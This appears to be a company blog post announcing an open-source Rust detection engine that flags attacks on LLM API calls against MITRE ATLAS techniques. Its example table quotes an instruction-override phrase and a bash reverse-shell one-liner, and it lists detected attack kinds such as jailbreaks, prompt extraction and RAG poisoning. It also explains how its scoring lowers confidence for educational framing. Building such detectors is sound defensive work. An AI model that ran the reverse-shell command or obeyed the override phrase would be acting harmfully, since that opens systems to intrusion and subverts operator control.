DEV Community

Cover image for We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate
AKAVLABS
AKAVLABS

Posted on

We open-sourced our AI attack detection engine — 97 MITRE ATLAS rules in a Rust crate

Today we're publishing atlas-detect — the detection engine that powers AgentSentry's AI attack prevention — as a standalone open-source Rust crate.

https://crates.io/crates/atlas-detect


The problem we were solving

When we started building AgentSentry, we needed to answer one question on every LLM API call: is this request an attack?

Not a heuristic guess. Not a vibe check. An actual mapping to the MITRE ATLAS framework — the authoritative catalogue of adversarial techniques targeting AI systems.

MITRE ATLAS has 16 tactics and 111 techniques. We needed to cover as many as possible, in real time, with zero tolerance for false positives on legitimate developer queries.

Here's what that looks like in practice:

"Ignore all previous instructions"          → AML.T0036 (Prompt Injection) — BLOCK
"How do I override a method in Python?"     → nothing — ALLOW  
"bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"  → AML.T0057.002 (Reverse Shell) — BLOCK
"Explain how prompt injection works"        → nothing — ALLOW (educational context)
Enter fullscreen mode Exit fullscreen mode

The second and fourth lines are where most detectors fail. We spent significant time on this.


How it works

The engine compiles all 97 detection patterns into a single RegexSet using Rust's regex crate. This means every request is scanned against all rules in one pass — not 97 sequential checks.

use atlas_detect::Detector;

let detector = Detector::new();
let hits = detector.scan("Ignore all previous instructions");

if detector.should_block(&hits) {
    // Returns: ["AML.T0036"]
}
Enter fullscreen mode Exit fullscreen mode

The initial compilation is cached globally via once_cell. After the first call, Detector::new() is free. Scan latency on typical LLM prompts is under 1ms.


The false positive problem

Early versions had a 30% false positive rate. Security education queries like "explain how prompt injection works for my course" were getting blocked alongside actual attacks.

The fix was confidence scoring. When a pattern matches, we compute a confidence score based on:

  • Base score from severity (Critical = 80, High = 65, Medium = 50...)
  • +20 if multiple techniques fire together (coordinated attack signal)
  • +20 if this agent has a high historical block rate
  • +10 if the message is unusually short (injections tend to be terse)
  • -25 if educational/research framing is detected

After scoring, we filter by threshold. A medium-severity hit needs 60% confidence to become a block. Critical hits only need 50%.

Result: 0% false positives on a 20-query clean test battery, 100% true positive rate maintained.


What it detects

97 content-detectable techniques across all 16 MITRE ATLAS tactics:

  • Prompt injection variants (AML.T0036 and sub-techniques)
  • Jailbreaks — DAN, STAN, roleplay framing, authority impersonation
  • Credential exfiltration — env var dumps, RAG credential harvesting
  • Model extraction — weight theft, system prompt extraction
  • RAG poisoning — embedded instructions in document-like content
  • Reverse shells and C2 — bash one-liners, PowerShell encoded commands
  • Multilingual injections — 20+ languages including Cyrillic homoglyphs
  • Base64/obfuscation evasion — decoded and re-scanned
  • Deepfake generation requests
  • Data destruction commands
  • Denial of service patterns

14 additional ATLAS techniques require behavioral detection (rate limiting, auth pattern analysis) — content regex can't catch them, and atlas-detect is honest about this in the docs.


Why open source this

The detection rules are not our competitive advantage. Anyone determined enough could reconstruct them from the MITRE ATLAS documentation.

Our advantage is the integrated system: the enforcement gateway, agent discovery, incident correlation, topology mapping, per-agent policy engine, and the platform that ties it all together. That stays closed.

But the detection engine is genuinely useful to the Rust community — anyone building an LLM proxy, an AI security tool, or just adding safety checks to an AI application. Publishing it creates goodwill, drives inbound interest in AgentSentry, and positions Akav Labs as contributors to the AI security ecosystem rather than just consumers of it.


Using it in your project

[dependencies]
atlas-detect = "0.1"
Enter fullscreen mode Exit fullscreen mode

With serde for JSON serialization:

atlas-detect = { version = "0.1", features = ["serde"] }
Enter fullscreen mode Exit fullscreen mode

With context for better accuracy:

use atlas_detect::{Detector, ScanContext};

let detector = Detector::new();
let ctx = ScanContext {
    content: user_message.to_string(),
    agent_block_history: get_agent_block_ratio(&agent_id),
    ..Default::default()
};
let hits = detector.scan_with_context(&ctx);
Enter fullscreen mode Exit fullscreen mode

Full documentation at docs.rs/atlas-detect.


What's next

We're working on:

  • atlas-detect-async — async wrapper for Tokio-based applications
  • Rule contribution guidelines — the community should be able to add patterns
  • OWASP Agentic Top 10 coverage alongside MITRE ATLAS
  • Language model-based detection for evasion-resistant techniques

If you're building something with this, we want to know. Open an issue on github.com/akav-labs/atlas-detect or find us at security@akav.io.


Built by Akav Labs — the team behind AgentSentry, the AI agent security platform.

https://akav.io | https://as.akav.io | https://crates.io/crates/atlas-detect

Top comments (0)